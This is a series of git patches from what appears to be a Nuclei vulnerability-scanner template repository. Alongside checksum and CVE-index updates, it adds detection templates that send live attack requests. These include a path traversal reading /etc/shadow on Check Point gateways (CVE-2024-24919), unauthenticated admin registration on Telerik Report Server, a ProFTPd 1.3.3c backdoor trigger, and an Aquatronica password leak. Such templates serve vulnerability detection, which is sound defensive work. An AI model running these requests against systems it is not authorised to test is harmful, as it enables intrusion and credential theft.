http/cves/2022/CVE-2022-0658.yaml:2b1f5971384f81ffce9e3a8427555bbd01b3b3a5 http/cves/2022/CVE-2022-0660.yaml:847e3682f3a3903749f0d44adf0697a838a405e4 -http/cves/2022/CVE-2022-0666.yaml:9333df97b369c29cff7be3249e4eaaa7257fd446 +http/cves/2022/CVE-2022-0666.yaml:0d419de095f12254b58c3b9b13c86ab3e6969390 http/cves/2022/CVE-2022-0678.yaml:8b33e92b350e562c7bece96f5e9328e7319792ae http/cves/2022/CVE-2022-0679.yaml:bb862b57bb18b1832313bed2c8f3095286ab5f0b http/cves/2022/CVE-2022-0692.yaml:16bb78665f4c62b041bf0641d2afe49587c40472 @@ -3286,6 +3286,7 @@ http/cves/2024/CVE-2024-25735.yaml:e6bb34d06213eebd89b7290f8a32a2c43772f8b6 http/cves/2024/CVE-2024-26331.yaml:717487e16279f4cd2d5666a4d83ab53f0475c4a2 http/cves/2024/CVE-2024-27198.yaml:11820d1d61eb185078709185d0cda080414cb333 http/cves/2024/CVE-2024-27199.yaml:6004f38f3a24fbb3a951270191c4af21b6e14e2d +http/cves/2024/CVE-2024-27348.yaml:b6afd2794a4897d3ea0154168726979ebd947dc6 http/cves/2024/CVE-2024-27497.yaml:60398b33810f93340a2641b108c2ed83ed635e88 http/cves/2024/CVE-2024-27564.yaml:59fbfb7c059d110b9a807d0d2205058ae1326e6b http/cves/2024/CVE-2024-27954.yaml:fe69ea721d3341747af165f3378e4f8bedb2ff43 @@ -8576,7 +8577,7 @@ network/misconfig/tidb-native-password.yaml:e59b6ae7f999845de1660e740e99c300175f network/misconfig/tidb-unauth.yaml:5c00fa571b47b099a046afc2a7ff5aba4bfd20fd network/misconfig/unauth-psql.yaml:4234beb83e518739f430de109340c402c96a3740 network/vulnerabilities/clockwatch-enterprise-rce.yaml:3b34549e3d1b3ddcddab7a8cdfd7b9c57c8f2d37 -passive/cves/2024/CVE-2024-25723.yaml:1408ea431542b2e64d0c2e3945a0452e45301fd0 +passive/cves/2024/CVE-2024-25723.yaml:3a0e459386db639b4548a3c5588bbb80fa80ad29 profiles/README.md:84e7479141844434737d87eea1ab678c04d11c33 profiles/all.yml:da115a47ed611622537dfbbe17e912010916c741 profiles/aws-cloud-config.yml:35d9feaf76e79bf9b83a33f0f95803a8cc97a9cc @@ -8621,7 +8622,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c31b229fb0da2ec8ad9b16ad0689dc7857e04240 +templates-checksum.txt:2b8fbacfb2772cd3809af3bccae99ba38931ed8e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 5e30a1480ce24acf1fa1a84225cc9ef71f5d2bb5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 3 Jun 2024 09:05:44 +0000 Subject: [PATCH 628/847] Auto Generated cves.json [Mon Jun 3 09:05:44 UTC 2024] :robot: --- cves.json | 1 + cves.json-checksum.txt | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index f21b56b2f4..0d999c385b 100644 --- a/cves.json +++ b/cves.json @@ -2389,6 +2389,7 @@ {"ID":"CVE-2024-26331","Info":{"Name":"ReCrystallize Server - Authentication Bypass","Severity":"high","Description":"This vulnerability allows an attacker to bypass authentication in the ReCrystallize Server application by manipulating the 'AdminUsername' cookie. This gives the attacker administrative access to the application's functionality, even when the default password has been changed.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-26331.yaml"} {"ID":"CVE-2024-27198","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"critical","Description":"In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-27198.yaml"} {"ID":"CVE-2024-27199","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"high","Description":"In JetBrains TeamCity before 2023.11.4 path traversal allowing to perform limited admin actions was possible\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-27199.yaml"} +{"ID":"CVE-2024-27348","Info":{"Name":"Apache HugeGraph-Server - Remote Command Execution","Severity":"high","Description":"Apache HugeGraph-Server is an open-source graph database that provides a scalable and high-performance solution for managing and analyzing large-scale graph data. It is commonly used in Java8 and Java11 environments. However, versions prior to 1.3.0 are vulnerable to a remote command execution (RCE) vulnerability in the gremlin component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-27348.yaml"} {"ID":"CVE-2024-27497","Info":{"Name":"Linksys E2000 1.0.06 position.js Improper Authentication","Severity":"high","Description":"Linksys E2000 Ver.1.0.06 build 1 is vulnerable to authentication bypass via the position.js file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-27497.yaml"} {"ID":"CVE-2024-27564","Info":{"Name":"ChatGPT个人专用版 - Server Side Request Forgery","Severity":"high","Description":"A Server-Side Request Forgery (SSRF) in pictureproxy.php of ChatGPT commit f9f4bbc allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the urlparameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-27564.yaml"} {"ID":"CVE-2024-27954","Info":{"Name":"WordPress Automatic Plugin \u003c3.92.1 - Arbitrary File Download and SSRF","Severity":"critical","Description":"WordPress Automatic plugin \u003c3.92.1 is vulnerable to unauthenticated Arbitrary File Download and SSRF Located in the downloader.php file, could permit attackers to download any file from a site. Sensitive data, including login credentials and backup files, could fall into the wrong hands. This vulnerability has been patched in version 3.92.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-27954.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 08b6bfcb99..b9cdde8cf7 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -e808b27672b538f74b345e3d92eb4a9f +d337d7264c683ea11584b411b8bcb172 From 10e92b1204f23742aef701ad3d0c1402a3148794 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 3 Jun 2024 09:07:30 +0000 Subject: [PATCH 629/847] Auto Template Signing [Mon Jun 3 09:07:30 UTC 2024] :robot: --- http/cves/2024/CVE-2024-27348.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-27348.yaml b/http/cves/2024/CVE-2024-27348.yaml index 1cf870bafa..6aee1c8210 100644 --- a/http/cves/2024/CVE-2024-27348.yaml +++ b/http/cves/2024/CVE-2024-27348.yaml @@ -41,3 +41,4 @@ http: - 'contains(header, "application/json")' - 'contains(body, "inputStream\":")' condition: and +# digest: 4a0a00473045022100aa9ae92d5900b75820e9ffcd29849fac5041ac03f2ae87c595cd533beb114ca002206bb3b4a4720b2ec86023bcbef0e2274fc1fb729953519ccad6dded1328e88770:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 6eb040597efd6ebc2c2bada4ca2b0411b7df9ea8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 3 Jun 2024 15:21:19 +0530 Subject: [PATCH 630/847] minor update --- .../exposed-panels/f5-admin-interface.yaml | 18 ++++++++++++------ 1 file changed, 12 insertions(+), 6 deletions(-) rename f5-admin-interface.yaml => http/exposed-panels/f5-admin-interface.yaml (69%) diff --git a/f5-admin-interface.yaml b/http/exposed-panels/f5-admin-interface.yaml similarity index 69% rename from f5-admin-interface.yaml rename to http/exposed-panels/f5-admin-interface.yaml index 1118f041e0..1564a48062 100644 --- a/f5-admin-interface.yaml +++ b/http/exposed-panels/f5-admin-interface.yaml @@ -1,24 +1,30 @@ id: f5-admin-interface + info: - name: F5 Admin Interface Detection - description: Detects F5 admin interfaces. + name: F5 Admin Interface - Detect author: drewvravick severity: high - tags: [f5, admin-interface, detection] + description: + Detects F5 Admin Interfaces. + tags: f5,admin,detection -requests: +http: - method: GET path: - "{{BaseURL}}/tmui/login.jsp" + redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word + part: body words: - 'BIG-IP Configuration Utility' - 'F5 Networks' - part: body + condition: and + - type: status status: - - 200 \ No newline at end of file + - 200 From 5addd1de0e3b4390ccdb316ff6536c8a84a48e1e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 3 Jun 2024 16:10:34 +0530 Subject: [PATCH 631/847] Create CVE-2024-4358.yaml --- http/cves/2024/CVE-2024-4358.yaml | 87 +++++++++++++++++++++++++++++++ 1 file changed, 87 insertions(+) create mode 100644 http/cves/2024/CVE-2024-4358.yaml diff --git a/http/cves/2024/CVE-2024-4358.yaml b/http/cves/2024/CVE-2024-4358.yaml new file mode 100644 index 0000000000..3e15ec1b3f --- /dev/null +++ b/http/cves/2024/CVE-2024-4358.yaml @@ -0,0 +1,87 @@ +id: CVE-2024-4358 + +info: + name: Telerik Report Server - Authentication Bypass + author: DhiyaneshDK + severity: critical + description: | + In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability. + reference: + - https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/ + - https://github.com/sinsinology/CVE-2024-4358 + metadata: + shodan-query: "Log in | Telerik Report Server" + tags: cve,cve2024,telerik,progress,auth-bypass + +variables: + user: "{{rand_base(6)}}" + pass: "{{rand_base(8)}}" + email: "{{randstr}}@{{rand_base(5)}}.com" + firstname: "{{rand_base(5)}}" + lastname: "{{rand_base(5)}}" + report: "{{to_lower(rand_text_alpha(8))}}" + + content: {{}} ##To Be Added + +http: + - raw: + - | + POST /Startup/Register HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + Username={{user}}&Password={{pass}}&ConfirmPassword={{pass}}&Email={{email}}&FirstName={{firstname}}&LastName={{lastname}} + + - | + POST /Token HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + grant_type=password&username={{user}}&password={{pass}} + + - | + POST /api/reportserver/report HTTP/1.1 + Host: {{Hostname}} + Authorization: Bearer {{token}} + Content-Type: application/json + + {"reportName": "{{report}}", "categoryName": "Samples", "description": null, "reportContent": "{{content}}", "extension": ".trdp"} + + - | + POST /api/reports/clients HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"timeStamp": null} + + - | + POST /api/reports/clients/{{clientid}}/parameters HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"report": "NAME/Samples/{{report}}/", "parameterValues": {}} + + matchers: + - type: dsl + dsl: + - 'contains(content_type_2, "application/json")' + - 'contains(body_2, "access_token") && contains(body_4, "clientId") && contains(body_5, "message")' + - 'status_code_2 == 200' + condition: and + + extractors: + - type: regex + name: token + part: body_2 + group: 1 + regex: + - '"access_token":"([A-Z0-9a-z_-]+)"' + internal: true + + - type: regex + name: clientid + part: body_4 + group: 1 + regex: + - '"clientId":"([a-z0-9]+)"' + internal: true From a2e926b9542274a3cf43c98579a06a3312b7145e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 3 Jun 2024 16:13:57 +0530 Subject: [PATCH 632/847] fix lint error --- http/cves/2024/CVE-2024-4358.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-4358.yaml b/http/cves/2024/CVE-2024-4358.yaml index 3e15ec1b3f..3919c7c39f 100644 --- a/http/cves/2024/CVE-2024-4358.yaml +++ b/http/cves/2024/CVE-2024-4358.yaml @@ -20,8 +20,7 @@ variables: firstname: "{{rand_base(5)}}" lastname: "{{rand_base(5)}}" report: "{{to_lower(rand_text_alpha(8))}}" - - content: {{}} ##To Be Added + content: "{{}}" ##To Be Added http: - raw: From 95b63e3b864b5f6b36ab270a8bdca2d7d2da3778 Mon Sep 17 00:00:00 2001 From: DevSecOps Date: Mon, 3 Jun 2024 08:20:37 -0400 Subject: [PATCH 633/847] modified regex and added more request parameters --- http/cves/2024/CVE-2024-24919.yaml | 16 +++++++++------- 1 file changed, 9 insertions(+), 7 deletions(-) diff --git a/http/cves/2024/CVE-2024-24919.yaml b/http/cves/2024/CVE-2024-24919.yaml index 4ed2a49243..70d85637df 100644 --- a/http/cves/2024/CVE-2024-24919.yaml +++ b/http/cves/2024/CVE-2024-24919.yaml @@ -5,17 +5,17 @@ info: author: johnk3r severity: high description: | - CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN or mobile access software blade. + CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN, or mobile access software blade. reference: - https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/ - https://support.checkpoint.com/results/sk/sk182337 metadata: - verified: true max-request: 1 vendor: checkpoint product: quantum_security_gateway - shodan-query: html:"Check Point SSL Network" cpe: cpe:2.3:h:checkpoint:quantum_security_gateway:*:*:*:*:*:*:*:* + shodan-query: html:"Check Point SSL Network" + verified: true tags: cve,cve2024,checkpoint,lfi http: @@ -23,19 +23,21 @@ http: - | POST /clients/MyCRL HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.2.7 + Content-Length: 39 + Accept-Encoding: gzip + Connection: close aCSHELL/../../../../../../../etc/shadow - matchers-condition: and matchers: - type: regex part: body regex: - - "root:" - - "nobody:" + - "root:.*" + - "nobody:.*" condition: and - type: status status: - 200 -# digest: 490a0046304402200cbd9f1fc5ea98e5649de5e1b43d62d38241188c12d1f4cf19709e2b2aab31a50220643a5fbf43545d89dd02819e0e92ee7fb898212836c04be5c18d446b1950705d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From a365149f938ed0d5e167a1d5a8cfd67da6a5c913 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 3 Jun 2024 17:51:14 +0530 Subject: [PATCH 634/847] minor update --- http/cves/2024/CVE-2024-4358.yaml | 46 ++++++++----------------------- 1 file changed, 12 insertions(+), 34 deletions(-) diff --git a/http/cves/2024/CVE-2024-4358.yaml b/http/cves/2024/CVE-2024-4358.yaml index 3919c7c39f..32f7e2d3b0 100644 --- a/http/cves/2024/CVE-2024-4358.yaml +++ b/http/cves/2024/CVE-2024-4358.yaml @@ -1,16 +1,21 @@ id: CVE-2024-4358 info: - name: Telerik Report Server - Authentication Bypass + name: Progress Telerik Report Server - Authentication Bypass author: DhiyaneshDK severity: critical description: | In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability. + impact: An unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability. + remediation: Updating to Report Server 2024 Q2 (10.1.24.514) or later. reference: - https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/ - https://github.com/sinsinology/CVE-2024-4358 + - https://docs.telerik.com/report-server/knowledge-base/registration-auth-bypass-cve-2024-4358 metadata: - shodan-query: "Log in | Telerik Report Server" + shodan-query: title:"Log in | Telerik Report Server" + verified: true + max-request: 2 tags: cve,cve2024,telerik,progress,auth-bypass variables: @@ -19,8 +24,6 @@ variables: email: "{{randstr}}@{{rand_base(5)}}.com" firstname: "{{rand_base(5)}}" lastname: "{{rand_base(5)}}" - report: "{{to_lower(rand_text_alpha(8))}}" - content: "{{}}" ##To Be Added http: - raw: @@ -38,33 +41,11 @@ http: grant_type=password&username={{user}}&password={{pass}} - - | - POST /api/reportserver/report HTTP/1.1 - Host: {{Hostname}} - Authorization: Bearer {{token}} - Content-Type: application/json - - {"reportName": "{{report}}", "categoryName": "Samples", "description": null, "reportContent": "{{content}}", "extension": ".trdp"} - - - | - POST /api/reports/clients HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"timeStamp": null} - - - | - POST /api/reports/clients/{{clientid}}/parameters HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"report": "NAME/Samples/{{report}}/", "parameterValues": {}} - matchers: - type: dsl dsl: - 'contains(content_type_2, "application/json")' - - 'contains(body_2, "access_token") && contains(body_4, "clientId") && contains(body_5, "message")' + - 'contains_all(body_2, "access_token", "userName", "token_type")' - 'status_code_2 == 200' condition: and @@ -77,10 +58,7 @@ http: - '"access_token":"([A-Z0-9a-z_-]+)"' internal: true - - type: regex - name: clientid - part: body_4 - group: 1 - regex: - - '"clientId":"([a-z0-9]+)"' - internal: true + - type: dsl + dsl: + - '"Username: "+ user' + - '"Password: "+ pass' From b6fd10317c4be27d48e79b32a48e8a23b5c4b965 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 3 Jun 2024 20:27:48 +0530 Subject: [PATCH 635/847] ProFTPd-1.3.3c - Backdoor Command Execution --- javascript/backdoor/proftpd-backdoor.yaml | 47 +++++++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 javascript/backdoor/proftpd-backdoor.yaml diff --git a/javascript/backdoor/proftpd-backdoor.yaml b/javascript/backdoor/proftpd-backdoor.yaml new file mode 100644 index 0000000000..dec673b6fc --- /dev/null +++ b/javascript/backdoor/proftpd-backdoor.yaml @@ -0,0 +1,47 @@ +id: proftpd-backdoor + +info: + name: ProFTPd-1.3.3c - Backdoor Command Execution + author: pussycat0x + severity: critical + description: | + This backdoor was present in the proftpd-1.3.3c. + reference: + - https://github.com/shafdo/ProFTPD-1.3.3c-Backdoor_Command_Execution_Automated_Script/blob/main/README.md + - https://www.rapid7.com/db/modules/exploit/unix/ftp/proftpd_133c_backdoor/ + metadata: + shodan-query: product:"ProFTPD" + tags: js,network,proftpd,ftp,backdoor + +javascript: + - code: | + const data = ["HELP ACIDBITCHEZ\n", "id"]; + const c = require("nuclei/net"); + let conn = c.Open('tcp', `${Host}:${Port}`); + let resp = conn.RecvFullString(); + if (resp.includes("ProFTPD 1.3.3c")) + { + for (let i = 0; i < data.length; i++) + { + conn.Send(data[i]); + console.log('Sending:', data[i]); + let resp = conn.RecvFullString(); + resp + } + } else + { + exit(); + } + + args: + Host: "{{Host}}" + Port: 21 + + matchers: + - type: dsl + dsl: + - "success == true" + + - type: regex + regex: + - "root:.*:0:0:" \ No newline at end of file From 3bb283ae56cde48bfaffc809fea6c870595fe166 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 3 Jun 2024 19:51:56 +0200 Subject: [PATCH 636/847] Add files via upload --- .../oracle-business-intelligence.yaml | 15 +++++++++++---- 1 file changed, 11 insertions(+), 4 deletions(-) diff --git a/http/exposed-panels/oracle-business-intelligence.yaml b/http/exposed-panels/oracle-business-intelligence.yaml index a3e69607ab..71752d1d94 100644 --- a/http/exposed-panels/oracle-business-intelligence.yaml +++ b/http/exposed-panels/oracle-business-intelligence.yaml @@ -2,7 +2,7 @@ id: oracle-business-intelligence info: name: Oracle Business Intelligence Login Panel - Detect - author: DhiyaneshDk + author: DhiyaneshDk,righettod severity: info description: Oracle Business Intelligence login panel was detected. classification: @@ -15,12 +15,16 @@ info: shodan-query: http.title:"Oracle Business Intelligence Sign In" vendor: oracle verified: true - tags: panel,oracle + tags: panel,oracle,login,detect http: - method: GET path: - "{{BaseURL}}/saw.dll?bieehome&startPage=1" + - "{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1" + - "{{BaseURL}}/analytics/saw.dll?Dashboard" + + stop-at-first-match: true matchers-condition: and matchers: @@ -28,8 +32,11 @@ http: part: body words: - "Oracle Business Intelligence Sign In" + - "Oracle Business Intelligence" + - "Oracle BI Presentation Services" + - "use Oracle BIEE" + condition: or - type: status status: - - 200 -# digest: 490a0046304402202d0f0872dc31339928d9204b365b95146aa2b96c875d64296ccd38a80719532f0220779348cd01ae70306abf69124771b2cc0699688635ed4fb3e1e8b292483cf211:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - 200 \ No newline at end of file From 41352d992a9d939e0c79f8850e7f5cc77891e27a Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 3 Jun 2024 19:53:17 +0200 Subject: [PATCH 637/847] Add reference attribute --- http/exposed-panels/oracle-business-intelligence.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/http/exposed-panels/oracle-business-intelligence.yaml b/http/exposed-panels/oracle-business-intelligence.yaml index 71752d1d94..0abbd2ab1d 100644 --- a/http/exposed-panels/oracle-business-intelligence.yaml +++ b/http/exposed-panels/oracle-business-intelligence.yaml @@ -5,6 +5,8 @@ info: author: DhiyaneshDk,righettod severity: info description: Oracle Business Intelligence login panel was detected. + reference: + - https://www.oracle.com/business-analytics/business-intelligence/technologies/bi.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 From da776929c49ecf39c13ade19fbd2335a7c10b861 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Mon, 3 Jun 2024 21:01:00 +0300 Subject: [PATCH 638/847] add aquatronica control system --- .../aquatronica-password-disclosure.yaml | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 http/vulnerabilities/other/aquatronica-password-disclosure.yaml diff --git a/http/vulnerabilities/other/aquatronica-password-disclosure.yaml b/http/vulnerabilities/other/aquatronica-password-disclosure.yaml new file mode 100644 index 0000000000..577ba53376 --- /dev/null +++ b/http/vulnerabilities/other/aquatronica-password-disclosure.yaml @@ -0,0 +1,37 @@ +id: aquatronica-password-disclosure + +info: + name: Aquatronica Control System 5.1.6 - Information Disclosure + author: securityforeveryone + severity: high + description: | + The tcp.php endpoint on the Aquatronica controller is exposed to unauthenticated attackers over the network. This vulnerability allows remote attackers to send a POST request which can reveal sensitive configuration information, including plaintext passwords. This can lead to unauthorized access and control over the aquarium controller, compromising its security and potentially allowing attackers to manipulate its settings. + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5824.php + - https://www.exploit-db.com/exploits/52028 + metadata: + verified: true + max-request: 1 + shodan-query: html:"aquatronica" + tags: exploitdb,aquatronica + +http: + - raw: + - | + POST /tcp.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + function_id=tcp_xml_request&command=WS_GET_NETWORK_CFG + + matchers-condition: and + matchers: + - type: word + words: + - "WEB_PASSWORD" + - "pwd="" + condition: and + + - type: status + status: + - 200 From 605438c6da7cda4f4e93181411d6cd2d77275fd1 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 3 Jun 2024 23:32:28 +0530 Subject: [PATCH 639/847] Create cox-business-panel.yaml --- http/exposed-panels/cox-business-panel.yaml | 34 +++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/exposed-panels/cox-business-panel.yaml diff --git a/http/exposed-panels/cox-business-panel.yaml b/http/exposed-panels/cox-business-panel.yaml new file mode 100644 index 0000000000..dc96a8c3f5 --- /dev/null +++ b/http/exposed-panels/cox-business-panel.yaml @@ -0,0 +1,34 @@ +id: cox-business-panel + +info: + name: Cox Business Dominion Gateway Login - Panel + author: DhiyaneshDK + severity: info + description: | + Cox Business Dominion Gateway Login page was discovered. + reference: + - https://samcurry.net/hacking-millions-of-modems + metadata: + verified: true + max-request: 1 + shodan-query: html:"Cox Business" + tags: cox,gateway,login,panel + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Cox Business Dominion Gateway - Login" + + - type: status + status: + - 200 From 15a82485907425025a53e594ecc2f78847b23dda Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 4 Jun 2024 11:52:19 +0530 Subject: [PATCH 640/847] minor update --- ...a-password-disclosure.yaml => aquatronica-info-leak.yaml} | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) rename http/vulnerabilities/other/{aquatronica-password-disclosure.yaml => aquatronica-info-leak.yaml} (91%) diff --git a/http/vulnerabilities/other/aquatronica-password-disclosure.yaml b/http/vulnerabilities/other/aquatronica-info-leak.yaml similarity index 91% rename from http/vulnerabilities/other/aquatronica-password-disclosure.yaml rename to http/vulnerabilities/other/aquatronica-info-leak.yaml index 577ba53376..a589de46cc 100644 --- a/http/vulnerabilities/other/aquatronica-password-disclosure.yaml +++ b/http/vulnerabilities/other/aquatronica-info-leak.yaml @@ -1,4 +1,4 @@ -id: aquatronica-password-disclosure +id: aquatronica-info-leak info: name: Aquatronica Control System 5.1.6 - Information Disclosure @@ -9,11 +9,12 @@ info: reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5824.php - https://www.exploit-db.com/exploits/52028 + - https://www.zeroscience.mk/codes/aqua.txt metadata: verified: true max-request: 1 shodan-query: html:"aquatronica" - tags: exploitdb,aquatronica + tags: exploitdb,aquatronica,info-leak http: - raw: From 2268f9afb97964c28c0da48efb07a003eb33dac6 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 4 Jun 2024 12:33:25 +0530 Subject: [PATCH 641/847] minor update --- http/cves/2024/CVE-2024-24919.yaml | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/http/cves/2024/CVE-2024-24919.yaml b/http/cves/2024/CVE-2024-24919.yaml index 70d85637df..598f70da74 100644 --- a/http/cves/2024/CVE-2024-24919.yaml +++ b/http/cves/2024/CVE-2024-24919.yaml @@ -10,12 +10,15 @@ info: - https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/ - https://support.checkpoint.com/results/sk/sk182337 metadata: + verified: true max-request: 1 vendor: checkpoint product: quantum_security_gateway + shodan-query: + - html:"Check Point SSL Network" + - http.html:"check point ssl network" + fofa-query: body="check point ssl network" cpe: cpe:2.3:h:checkpoint:quantum_security_gateway:*:*:*:*:*:*:*:* - shodan-query: html:"Check Point SSL Network" - verified: true tags: cve,cve2024,checkpoint,lfi http: @@ -23,12 +26,10 @@ http: - | POST /clients/MyCRL HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.2.7 - Content-Length: 39 Accept-Encoding: gzip - Connection: close aCSHELL/../../../../../../../etc/shadow + matchers-condition: and matchers: - type: regex From ba94ac01ee124eab5ac1689c7f2668150caa8f81 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 4 Jun 2024 07:12:47 +0000 Subject: [PATCH 642/847] Auto Generated New Template Addition List [Tue Jun 4 07:12:47 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index a025f3b8c0..cd62c442a4 100644 --- a/.new-additions +++ b/.new-additions @@ -8,6 +8,7 @@ http/cves/2023/CVE-2023-3077.yaml http/cves/2023/CVE-2023-48084.yaml http/cves/2024/CVE-2024-21683.yaml http/cves/2024/CVE-2024-24919.yaml +http/cves/2024/CVE-2024-27348.yaml http/cves/2024/CVE-2024-34470.yaml http/cves/2024/CVE-2024-3495.yaml http/cves/2024/CVE-2024-3822.yaml From 156eb0b2a251f3d2c91399e87a1f4a7bb388439c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jun 2024 07:12:53 +0000 Subject: [PATCH 643/847] Auto Generated Templates Checksum [Tue Jun 4 07:12:53 UTC 2024] :robot: --- templates-checksum.txt | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 49882b27ee..02b7421015 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -187,8 +187,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:6c374eeb1f547d318a2f0d87d01236bef68c380c -cves.json-checksum.txt:0b1d7e32abf421aa809f190ddd8f70823694eb05 +cves.json:ee679e39399a1034603fc71366f0ce86effc9394 +cves.json-checksum.txt:0650e06b1d0806329262c0f0bb6b558ddd1ac707 dast/cves/2018/CVE-2018-19518.yaml:06ecee25413d9f238e2ae0138b4775f0243e8d22 dast/cves/2021/CVE-2021-45046.yaml:d470397419ae4ef5db02b0a833013fe295576396 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -3279,14 +3279,14 @@ http/cves/2024/CVE-2024-2340.yaml:2b0b9e95cf442c8b162d18c5d337c05baac60b18 http/cves/2024/CVE-2024-2389.yaml:6fa69f07abbcfc935f223d3196bcfafc693c1c07 http/cves/2024/CVE-2024-23917.yaml:da590499bc9e18895403a8cb81ea4c93bfbec9ef http/cves/2024/CVE-2024-24131.yaml:48167253e7792f9b8917abc160391bde7497afff 